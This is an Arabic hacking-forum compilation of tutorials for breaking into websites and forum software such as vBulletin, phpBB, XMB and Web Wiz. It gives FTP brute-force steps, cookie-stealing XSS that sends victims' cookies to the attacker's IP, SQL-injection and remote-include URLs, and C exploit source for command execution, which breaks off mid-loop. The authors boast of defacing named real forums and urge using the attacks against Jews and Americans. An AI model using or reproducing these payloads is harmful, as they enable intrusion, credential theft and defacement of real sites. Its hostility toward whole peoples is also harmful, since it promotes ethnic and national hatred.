    اختراق المواقع عن طريق الـ FTP

    اختراق المواقع ببرامج الاف تي بي


    اختراق المواقع ببرامج الاف تي بي
    اختراق المواقع ببرامج الاف تي بي

    بعد اذن طبعاً محترف اختراق المواقع
    اختراق المواقع
    اختراق اى موقع ليس مجانى بمعنى انه يكون اسم نطاقى
    yourname.com
    yourname.net
    yourname.org
    yourname.biz
    yourname.info
    other
    يكون من الصعب اختراقة بالنسبة لاى هكر لانه غالبا ما يستخدم DNS Server
    ونظم حماية كثيرة قد تصعب نسبة اختراقة 99%

    لكن كن معى فى هذا الموضوع وسيكون كل شىء سهل بذن الله

    -------

    يجب عندما تحارب شخص ان تعلم كل شىء عنه وهذا ما سنستخدمة فى هذه الخطوة
    يجب ان نعرف نظم الحماية التى يستخدمها الموقع
    ومن صاحب الموقع
    وكل شىء اولا كى نستطيع دخول ساحة المناورة

    ---

    لتقوم بذلك قم بالدخول الى هذا الموقع
    Whois.net - Domain Names

    فى السطر الثانى من الصفحة التى ستظهر لك ستجد هذا السطر
    WHOIS Lookup
    قم بكتابة اسم الموقع بجوارها على سبيل المثال
    Victim.com
    victim = الموقع الذى تريد احضار المعلومات عنه
    ثم اضغط go
    سيقوم فى هذه الحالة باحضار معلومات عن الموقع الذى تريدة اليك وعن الحماية التى يستخدموها والشركة المستضيفة للموقع
    قم بقرائة البيانات جيدا اذا وجدت ما يكفيك من المعلومات تكون قد انتهيت من هذه الخطوة اذ لم يكن قم باحضار معلومات عن الشركة المستضيفة والذى سيعطيك عنوان موقعها ضمن البيانات قم بادخال عنوان الموقع فى نفس الموقع لتحضر معلومات اكثر
    ثم قم بالتدقيق فى نظم الحماية التى تعطيها الشركة لعملائها

    واذا لم تجد ايضا قم بالدخول الى هذا الموقع فهو يعتبر من افضل المواقع التى تعطيك معلومات عن نظم الحماية
    Netcraft Ltd - Internet Research, Anti-Phishing and PCI Security Services

    وهكذا نكون قد انتهينا من اول خطوة

    ---------------------------------------

    قم باحضار عنوان الاى بى الخاص بالموقع من خلال

    اذهب الى استارتstart ومنها تشغيل runواكتب الامر command واكتب فى شاشة الدوس التى ستظهر ping www.vicitm.com حيث vicitim.com هو الموقع الضحية

    ---------------------------------------

    قم بعمل سكان على الموقع من خلال اى برامج السكانر على المواقع مثل برنامج
    site port scan , Gfi lan giard network securty scanner
    او برامج عمل السكان على الاجزة لكنها ستكون ضعيفة

    وهذه هى اهم خطوة لان من خلالها سنقوم بالبحث عن الثغرات الموجوده فى السيرفر
    غالبا ما ستجد البورت 80 و 21 و 808
    لا يمكننا الهجوم من خلال البورت رقم 21 حيث انه سيكون مشفر بكلمة سر لصالح صاحب الموقع لانه عنوان الاف تى بى الذى يقوم برفع الملفات من خلاله

    لدينا فى اكثر الحالات منفذان البورت 80 و 808
    او 80 فقط اذا كان

    اذا ظهر لك 80 فقط فما فى شىء بيتغير وتكون الخطوات تمام
    قم بتجرب الهجوم على المنافذ التى ظهرت لك مفتوحة مهما كانت من خلال برنامج
    ws-ftp
    او
    cute
    مع تغيير البورت من 21 الى 80 او المنفذ الذى ظهر اليك مفتوح فى خيارات الادفاسيد advanced الموجودة فى الشاشة الابتدائية للبرنامج
    قم بكتابة مكان host رقم الاى بى الخاص بالموقع او عنوان الموقع عن طريق الاف تى بى وغالبا ما يكون ftp.sitename.address
    sitename = اسم الموقع
    address = الامتداد .com او .net او غير ذلك

    فى المرة هذه الخطوة قم بالدخول بصفة زائر
    وذلك عن طريق وضع علامة صح امام كلمة anonymous
    وسيقوم البرنامج وضع كلمة السر الافتراضية لدخولك
    اذا تمت عملية الدخول قم بالتاكد انك ليس فى قسم الزوار وستكون ملحوظة فان قسم الزوار يكون فارغ
    اما اذا وجدت نفسك تتنقل بين ملفات الموقع فستكون بذلك قد اخترقت الموقع

    واذا وجدت نفسك فى قسم الزوار عليك ان تكمل معنا المسار
    قم بتحميل برنامج unsecure وهو افضل برامج اختراق المواقع
    لانه به مميزات هائلة وهو من افضل البرامج بل افضلها على الاطلاق
    وستجدة فى كثيير من المواقع فقط قم بالبحث فى محرك بحث جوجل
    عن هذا الاسم
    unsecure 1.2
    وستجد مئات المواقع باذن الله
    بعد ان تقوم بتحميل البرنامج
    قم بكتابة عنوان الاف تى بى الخاص بالموقع
    او الاى بى اذا قمت بالحصول عليه من خلال الطريقة التى قمت بشرحها
    قم بتحديد مكان القاموس وبالتحديد على جميع خيارات البرتا فورس
    لتشكيل هجوم ثنائى مضاعف ثم قم بعمل كونكت
    وانتظر حتى يجد الباس ورد وغالبا ما سيجدها لان نظام البرتا فورس يقوم بتخمين كلى للباس وردات

    بعد ان تاتيك الباس ورد قم بالدخول بواسطتها من خلال برنامج الاف تى بى من البورت 21 وليس 80

    واكمل البيانات وضع مكان اليوسر نيم اسم الموقع بدون دوت
    مثال اذا كان الموقع usa.com
    يكون اسم الدخول usa

    ومكان الباس ورد قم بكتابة الباس ورد التى قام البرنامج باحضارها اليك

    وهكذا تكون قد اخترقت الموقع

    اما اذا لم تنجح معك هذه الطرق التى قمت بوضعها لك ولم تستطيع اختراق الموقع فعليك ان تنسى عملية اختراق الموقع نهائيا من الافضل لانها فى هذه الحالة ستكون مستحيلة فانت قد قمت بهذه الطريقة باختراق سيرفر DNS وهو من افضل نظم الحماية من خلال البورت 80
    وقمت باستعمال برنامج unsecure
    ولم تستطيع
    وعملت scan
    وحاولت الاختراق من المنافذ التى ظهرت لك مفتوحة من خلال الاف تى بى ولم تستطيع
    فان لم تستطيع اختراق الموقع قم بنسيان هذا الموقع فورا
    منقووووووووول

    جميع اختراقات المنتديات بجميع انواعها ...... هام جدا جدا جدا
    ________________________________________

    مجموعه مواضيع مفيدة لكل الهاكرز وبجميع مستوياتهم فأرجوا منكم أن لا تستخدموا هذه المعلومات في مضرة المسلمين و إيذاء إخوانكم في الدين
    ولكن أرجوا أن تستخدموها ضد اليهود والامريكان

    أولا سم بالله وابدأ :
    بسم الله الرحمن الرحيم


    جميع طرق اختراق المنتديات


    ---------
    مقدمة :
    ---------

    الموضوع : اختراق الـ vBulletin
    المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
    المستوى : متوسط

    ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .


    ----------
    الثغرة :
    ---------

    تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
    بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

    قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
    ********>********.write('<img
    src="http://my_ip_address/'+********.****ie+'">';***********

    مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

    وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
    من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
    الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

    وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
    مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
    ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

    ابحث عن الكود الخاص بالباسورد .. مثال :

    GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb








    ddf90622;%20sessionhash=a
    4719cd620534914930b86839c4bb5f8;%20bbthreadview[54








    20]=1012444064;%20bblastvi
    sit=1011983161

    فكر قليلا الان .. اين الباسورد ؟؟
    الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
    قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
    http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
    ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
    في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
    لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
    وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

    اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

    ------------
    الحل
    -----------

    للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
    (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

    كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة ********> فاذا وضعت <img> او ********* او
    اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
    Be Secret .. Dont' be Lamer .

    تاريخ اكتشاف الثغرة : 31 - 1 - 2002
    تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


    أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين



    ======================================
    إختراق منتديات VP
    ======================================
    اختراق المنتديات بس بمنتديات vb

    . قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

    2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

    3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

    أو العنوان التفصيلي التالي :
    http://URL/memberlist.php

    URL = العنوان المستضيف للمنتدى

    مثل = - .com

    4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

    سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

    http://URL/member.php?soitgoe68e45u...info&userid=266

    هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

    5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

    http://URL/member.php?soitgoe68e45u...etinfo&userid=1

    العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

    (((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

    أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

    6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

    http://URL/member.php?action=login&...VALIDPASS&url=');'.$use rs=$DB_site->query('update+user+set+email='[email protected]'+ WH E RE+username='ADMIN'').'

    العنوان هذا ستقوم بتغيير الكلمات التالية

    URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
    VALIDUSER = أسم المستخدم الخاص بك
    VALIDPASS = كلمة السر الخاصة بك
    [email protected] = البريد الذي سجلت به بالمنتدى
    ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

    7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ******* .

    8. ثم ترجع لصفحة المنتدى الرئيسية
    http://url/index.php

    ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

    بالطيع ستظهر لك الصفحة التعيسة التي تقول :

    أنت قمت بكتابة كلمة سر خاطئة

    you typed in the wrong password


    9. بكل بساطة أضغط على

    نسيت كلمة السر
    forgot password

    والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

    10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

    ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم

    ======================================
    إختراق منتديات xmb
    ======================================
    تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..

    وصف للثغره::
    وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر

    الأصدار المصاب:::
    XMB 1.6 Magic Lantern Final

    الشرح والتطبيق:::
    جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:

    1- عليك بالذهاب الى موقع جوجل Google
    2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
    3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
    لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
    4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
    index_log.log يعني راح يكون متل هدا
    http://www.******.com/massegboard/index_log.log
    5- راح ينزل عندك ملف والملف عباره عن ملف مثل الكوكيز كبير وفيه اسماء
    المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
    6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
    وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
    7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك متل
    هذا مثلا::
    xmbuser=admin
    واباس راح تلقاه قدامه مثل هذا
    xmbpw=1faeb6747a31c854800ddf3c62b1717a
    8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
    CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
    ftp://www.cafecounterintelligence.com/cci/chigger.exe


    ======================================
    إختراق منتديات Web Wiz Guide
    ======================================
    مثال:basharnet.com
    هذه الطريقة أقدمها لكل الهاكرز المبتدئين لأنها سهلة جدا وما بدا غير تحمل هالملف وتتصفح الباسوورد على كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن الهاكر بقرائتك لهذه الثغرة تستطيع أن تخترق منتدى
    أغلب المنتديات مصابة بهذه الثغرة


    بسم الله الرحمن الرحيم

    الشرح: ثغرة تصيب منتديات Web Wiz Guide

    أولا إذهب إلى google
    اكتب
    Web Wiz forum

    وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
    admin/wwforum.mdb

    حمل الملف وادخل عليه عن طريق microsoft office access

    بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin

    سجل اسمك والباسوورد

    الآن أنت في لوحة التحكم
    ها ها ها ها
    بس ما حدا يخترق المنتديات الوجودة في محرك البحث قوقل التي قمت باختراقها أنا
    هذا منتدى قمت باختراقه لاحقا
    http://www.plasticcube.com/Forum/default.asp
    اكتبوا فيه ما تشائون يا أعضاء وزوار منتديا عرب للأبد
    وهي منندى ثان
    هذا منتدى دينيماركي
    http://www.naturklub.dk/forum/


    ثغرة في معظم منتديات الـ asp

    ++++++++++++++++++++++++++
    سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages
    وعليها فقس
    طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد بياناتها .

    بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما يكروسوفت الا اذا لم يوجد له بديل ...الخ
    وتعتمد قواعد بياناتها على ثلاثة أنواع هي :
    sqlserver && sql && M.S Access

    واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا .

    واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي باسم philboard.asp
    مثل هذا المنتدى http://www.khill.co.uk/forum/philboard.asp
    وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث عن -------------- > philboard وانتظر النتائج ....

    -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    كيف تحمل قاعدة البيانات ؟
    اكتب هذا الامتداد
    وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم قاعدة البيانات صغير جدا للتطبيق والتسليم بسرعة
    وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات
    database/philboard.mdb
    وتكتبه بعد اسم الموقع والمنتدى مثل
    http://www.khill.co.uk/forum/database/philboard.mdb

    ولا بد لكي تقرا قاعدة البيانات ان يكون في جهازك برنامج ما يكروسوفت أكسس
    وبعد فتح قاعدة البيانات ستجد بداخلها عدة جداول فيها جميع محتويات قاعدة البيانات
    من ضمنها وهو المهم جدول المستخدمين ال users
    وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد

    الآن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟
    لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف العام

    philboard_admin.asp وهذا عنوانها
    مثال
    http://www.khill.co.uk/forum/philboard_admin.asp

    ادخل وستجد كل منتدى وبجانبة كلمه delete و edit
    احذف كل المنتديات وأنشا منتديات جديدة واكتب عليها
    ****** by xxxxxxxxxx
    xxxxxxx يعني اسمك ,,,

    من وين ؟

    من المربعين الموجودة بالاسفل في لوحة التحكم
    اكتب في المستطيل ****** by xxxxxxxxxx
    وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع
    واضغط add يعني اضافة

    ومبرووووووووووووووووووووو وووووووووووك ألف مبرووووووووووك اول اختراق لك

    والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات لكل منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد

    __________________________________________________

    تفضلو ثغرة في هاك الرد السريع منتدى PHPBB

    عند تركيبك لهاك الرد السريع
    سوف تجد هذا الكود


    if ( $mode == 'smilies' )
    {
    define('IN_PHPBB', true);
    include($phpbb_root_path . 'extension.inc');
    include($phpbb_root_path . 'common.'.$phpEx);
    include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
    generate_smilies('window', PAGE_POSTING);
    exit;
    }



    دقق جيدا بهذا الكود
    ثم أنشاء ملف جديد سمه extension.inc

    وضع داخلها مثلا
    شفرة

    <?php
    include('config'.'.php');
    echo "DB Type: $dbms <br>";
    echo "DB Host: $dbhost <br>";
    echo "DB Name: $dbname <br>";
    echo "DB User: $dbuser <br>";
    echo "DB Pass: $dbpasswd <br>";
    exit;
    ?>



    يمكنك وض الخيارات التي تود مشاهدتها من الهاك

    الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
    أتجه الى هذا العنوان

    URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles

    بسهولة أستبدل [phpBB_Forum]
    بعنوان المنتدى المستهدف
    [Your Server]
    بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به

    ماذا ترى؟؟؟
    معلومات قاعدة البيانات بين ايديك

    الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات :

    ببساطة أفتح الملف quick_reply.php
    أبحث عن
    if ( $mode == 'smilies' )
    أَضف بعدها مباشرة
    phpbb_root_path = "./";

    وانشاءالله انحلت المشكلة


    _________________




    ثغره جديده في منتديات الvb
    ________________________
    أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله

    لكن هذي كانت على النسخة التجريبية Beta

    بالنسبة للثغرة فهي واضحة
    وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك

    طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
    http://[victim]/forum/private.php




    PHP:

    --------------------------------------------------------------------------------


    From: Ferruh Mavituna
    Subject: VBulletin Preview Message&nbs
    p;- XSS Vuln


    ---------------------------------------
    ---------------
    VBulletin Private Message&nbs
    p;"Preview
    Message" XSS Vulnerability
    ---------------------------------------
    ---------------
    Any kind of XSS att
    acks possibility.

    -----------------------------------------------------
    -
    About VBulletin;
    -----------------------------------------------------
    -
    PHP Based Popular Forum&
    nbsp;Application
    Vendor & Demo;
    <a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a>

    ---------------------------------------
    ---------------
    Vulnerable;
    -----------------------------------------------------
    -
    vBulletin 3.0.0 Beta 2
    <
    br />vBulletin 2.x
    ---------------------------------------
    ---------------

    -----------------------------------------------------
    -
    Vendor Status;
    -----------------------------------------------------
    -
    I can not contact v
    endor for this issue ! No patch available at&nb
    sp;the moment;

    -----------------------------------------------------
    -
    Solution;
    -----------------------------------------------------
    -
    HTML Encoding like post&
    nbsp;thread preview page;

    -----------------------------------------------------
    -
    Exploit Code;
    -----------------------------------------------------
    -
    <html>
    <body>
    <form action="http://[victim]/forum/private.php"&nbs
    p;method="post"
    name="vbform">
    <input type="hidden" name="do" value="insertpm" />
    <input type="hidden" name="pmid" value="" />
    <input type="hidden" name="forward" value="" />
    <input type="hidden" name="receipt" value="0" />

    <input type="text" class="bginput" name="title" value="" size="40"
    tabindex="2" />
    <textarea name="message" rows="20" cols="70" wrap="virtual"
    tabindex="3"></textarea>
    <input type="submit" class="button" name="sbutton" value="Post
    Message"
    accesskey="s" tabindex="4" />
    <input type="submit" class="button" value="Preview
    Message" accesskey="p"
    name="preview" onclick="this.form.dopreview = true; return
    true;this.form.submit()" tabindex="5" >

    <input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
    checked="checked" />
    <input type="checkbox" name="signature" value="1" id="cb_signature" />
    <input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
    checked="checked" />
    <input type="checkbox" name="disablesmilies" value="1"
    id="cb_disablesmilies" />
    </form>
    ********>
    //Set Values and Submit
    // You
    can write your own JS codes
    var xss = "\">********>*****(********.coo
    kie)***********";
    ********.vbform.title.value=xss;
    ********.vbform.preview.click();
    ***********
    </body>
    </html>


    *You may need login first


    Ferruh Mavituna
    Web Application Security
    Consultant
    Freelance Developer & Designer
    <a href="http://ferruh.mavituna.com"
    target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a>



    الموضوع منقول

    اختراق جميع المنتديات.......الجزء2
    ________________________________________

    --------------------------------------------------------------------------------

    ثغره جميله لاختراق منتيات الفورم
    ____________________________
    طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . .

    وامتدادها تكون . . .
    admin/wwforum.mdb

    www.###.com/forum
    تصبح . . .
    www.###.com/forum/admin/wwforum.mdb



    طريقه البحث عن الثغره . . . .
    www.google.com
    وتبحث عن
    Web Wiz forum

    ويمكنك كتابه
    Web Wiz forum 1
    Web Wiz forum 2.1

    __________________________________________________
    ___________
    ثغرة في منتديات vBulletin في ملفcalendar.php
    _ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
    تأكد من وجود ملف calendar.php
    إذا كان موجود إدخل هذا العنوان
    http://www.example.com/vb/calendar....mma=%22;echo%20'';%20echo%20%60<comman d>%20%60;die();echo%22
    المتغيرات
    1-example.com بإسم الموقع
    2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd



    ______________________________________________
    ثغرة vBulletin
    -------------------------------------------------------------------
    Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or ********** into the ********. So by directing a user to, for example:

    http://vulnerable/forum/memberlist....E********%3D%27
    http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%


    2Ephp%3F****%3D%27%2B
    escape%28********%2E****ie%29%3C%2F******%3E
    (NOTE: The URL should be on a one line)

    You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
    ********>
    ******** = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3C******%3E********%3D
    %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


    rd%2Ephp%3F****%3D%27
    %2Bescape%28********%2E****ie%29%3C%2F******%3E"
    ***********
    And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/****ie stealing code, and then to http://www.swgmotu.com.

    With the recorded user id and password hash, we can access the site:
    http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
    -----------------------------------------------------------------------------------

    منقول من موقع امركي



    ___________________________________
    ثغرة vbulletin2

    gosper is credited with disclosing this to securiteam on 9-24-02 along with a
    working exploit and he probably discovered it too. I wrote this because his
    exploit didn't URL encode all the characters that needed to be URL encoded
    in order for some of the inputted commands to work properly. I added a date
    argument which is essential for exploiting the security hole. I also used an
    fdopen() and fgets() to make sure all the output was recieved and displayed
    correctly, at least I hope it works better . Last thing I built in was HTTP
    version 1.1 support so that you can use this against virtual hosts. Yeah... and
    you can exploit this with a web browser too, its just easier to use this program,
    most of the time.

    Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
    End of Days, sk3tch and all the people in #ozane (www.ozane.net). If I
    forgot you, well ****.

    Compile: gcc vbcal.c -o vbcal
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    #include <signal.h>
    #include <unistd.h>

    #define url1 "calendar.php?calbirthdays=1&action=getday&day ="
    #define url2 "&comma=%22;echo%20'';%20echo%20%60"
    #define url3 "%60;die();echo%22"

    void time_out(void)
    {
    printf("\ntimed out on connect()\n");
    exit(0);
    }

    void usage (char *prog)
    {
    printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
    printf("\t The -h and -d arguments are required, the rest are optional.");
    printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
    printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
    printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
    printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
    printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
    exit(0);
    }


    int main(int argc, char *argv[])
    {
    int c, x, sockfd, verbose = 0;
    int timeout = 10; /* timeout for connection */
    int port = 80; /* 80 default for HTTPD */
    char *path = "/"; /* url path, default = "/" */
    char *host = NULL, *date = NULL;
    char sign = '%';
    char *prog;
    char tmp[2];
    char tmp2[4];
    char cmd_buf[501];
    char encoded_cmd[501];
    char data[1024];
    char output[20480]; /* 20k recv buf */
    struct sockaddr_in addr;
    struct hostent *he;
    struct sigaction action;
    FILE *f;

    memset(&tmp, '\0', sizeof(tmp));
    memset(&tmp2, '\0', sizeof(tmp2));
    memset(&cmd_buf, '\0', sizeof(cmd_buf));
    memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
    memset(&data, '\0', sizeof(data));
    memset(&output, '\0', sizeof(output));

    prog = argv[0];

    fprintf(stderr, "\t ---[ vb_cal.c\n");
    fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
    fprintf(stderr, "\t ---[ c0ded by st0ic\n");
    fprintf(stderr, "\t ---[ www.fsix.net\n");

    if (argc < 5 || argc > 12)
    usage(prog);


    while ( (c = getopt(argc, argv, "h:u:t:v")) != -1 )
    {
    switch(c)
    {
    case 'h': /* host */
    {
    host = optarg;
    break;
    }
    case 'd':
    {
    date = optarg;
    break;
    }
    case 'u': /* url path */
    {
    path = optarg;
    break;
    }
    case 'p': /* port */
    {
    port = atoi(optarg);
    break;
    }
    case 't': /* connect timeout */
    {
    timeout = atoi(optarg);
    break;
    }
    case 'v':
    {
    verbose = 1;
    break;
    }
    default:
    usage(prog);
    }
    }
    /* make sure we got the required stuff */
    if (host == NULL)
    usage(prog);
    else if (date == NULL)
    usage(prog);

    if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
    perror("socket()");
    exit(1);
    }

    if ( (he = gethostbyname(host)) == NULL)
    {
    perror("gethostbyname()");
    exit(1);
    }
    bzero(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr = *( (struct in_addr *)he->h_addr);
    addr.sin_port = htons(port);

    bzero(&action, sizeof(action));
    action.sa_handler = (void *)time_out;
    action.sa_flags = 0;
    sigaction(SIGALRM, &action, 0);

    alarm(timeout);
    if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
    perror("connect()");
    exit(1);
    }
    alarm(0);
    printf("\\q to exit cmd prompt\n");
    while(1)
    {
    printf("cmd> ");
    fgets(cmd_buf, sizeof(cmd_buf), stdin);
    for (x = 0; x < strlen(cmd_buf); x++)
    if (cmd_buf[x] == '\n')
    cmd_buf[x] = '\0';

    if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
    exit(0);


    for (x = 0; x < strlen(cmd_buf); x++)
    {
    tmp[0] = cmd_buf[x];
    /* 0 - 9 */
